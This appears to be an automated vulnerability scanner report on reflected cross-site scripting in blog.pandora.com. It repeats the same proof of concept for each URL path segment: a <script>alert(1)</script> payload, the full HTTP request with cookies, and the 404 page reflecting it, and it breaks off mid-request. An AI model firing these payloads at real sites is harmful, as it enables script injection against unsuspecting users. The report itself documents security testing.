<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora812a3<script>alert(1)</script>4963365f5f1/archives/2005/12/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bb8f3<script>alert(1)</script>2960d34c74e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesbb8f3<script>alert(1)</script>2960d34c74e/2005/12/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:25 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesbb8f3<script>alert(1)</script>2960d34c74e/2005/12/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 97499<script>alert(1)</script>74af091ba5d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/200597499<script>alert(1)</script>74af091ba5d/12/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:28 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/200597499<script>alert(1)</script>74af091ba5d/12/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d6250<script>alert(1)</script>f5b95efae30 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2005/12d6250<script>alert(1)</script>f5b95efae30/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:30 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2005/12d6250<script>alert(1)</script>f5b95efae30/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 176cf<script>alert(1)</script>b4e0ebb55d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora176cf<script>alert(1)</script>b4e0ebb55d/archives/2006/01/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:22 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 348
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora176cf<script>alert(1)</script>b4e0ebb55d/archives/2006/01/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a4d2d<script>alert(1)</script>1fffc06b069 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesa4d2d<script>alert(1)</script>1fffc06b069/2006/01/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:25 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesa4d2d<script>alert(1)</script>1fffc06b069/2006/01/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b5cfe<script>alert(1)</script>3585d67671d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006b5cfe<script>alert(1)</script>3585d67671d/01/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:27 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2006b5cfe<script>alert(1)</script>3585d67671d/01/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 86220<script>alert(1)</script>bfa750f2e3a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006/0186220<script>alert(1)</script>bfa750f2e3a/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:30 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2006/0186220<script>alert(1)</script>bfa750f2e3a/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 37767<script>alert(1)</script>96a3bdaf0ab was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora37767<script>alert(1)</script>96a3bdaf0ab/archives/2006/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:24 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora37767<script>alert(1)</script>96a3bdaf0ab/archives/2006/02/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5bb5d<script>alert(1)</script>6b31a0b7960 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives5bb5d<script>alert(1)</script>6b31a0b7960/2006/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:26 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives5bb5d<script>alert(1)</script>6b31a0b7960/2006/02/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 654b6<script>alert(1)</script>c48ada1686b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006654b6<script>alert(1)</script>c48ada1686b/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:28 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006654b6<script>alert(1)</script>c48ada1686b/02/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5aa91<script>alert(1)</script>9eb948f65af was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006/025aa91<script>alert(1)</script>9eb948f65af/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:31 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/025aa91<script>alert(1)</script>9eb948f65af/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d88f4<script>alert(1)</script>a463141d672 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorad88f4<script>alert(1)</script>a463141d672/archives/2006/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:59 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorad88f4<script>alert(1)</script>a463141d672/archives/2006/03/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 970b7<script>alert(1)</script>535a013270b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives970b7<script>alert(1)</script>535a013270b/2006/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:07:01 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives970b7<script>alert(1)</script>535a013270b/2006/03/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 35243<script>alert(1)</script>cbe6a64b700 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/200635243<script>alert(1)</script>cbe6a64b700/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:07:03 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/200635243<script>alert(1)</script>cbe6a64b700/03/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5e7ab<script>alert(1)</script>fa977886cf6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006/035e7ab<script>alert(1)</script>fa977886cf6/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:07:07 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/035e7ab<script>alert(1)</script>fa977886cf6/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d20c0<script>alert(1)</script>dd135c67fdd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorad20c0<script>alert(1)</script>dd135c67fdd/archives/2006/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:47 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorad20c0<script>alert(1)</script>dd135c67fdd/archives/2006/04/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ae903<script>alert(1)</script>470ea815a03 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesae903<script>alert(1)</script>470ea815a03/2006/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:53 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesae903<script>alert(1)</script>470ea815a03/2006/04/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7efd0<script>alert(1)</script>a5036d92cf6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20067efd0<script>alert(1)</script>a5036d92cf6/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:57 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20067efd0<script>alert(1)</script>a5036d92cf6/04/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8bc6a<script>alert(1)</script>12e73a2793e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006/048bc6a<script>alert(1)</script>12e73a2793e/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:07:02 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/048bc6a<script>alert(1)</script>12e73a2793e/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cd43a<script>alert(1)</script>e86a08eb842 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoracd43a<script>alert(1)</script>e86a08eb842/archives/2006/05/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
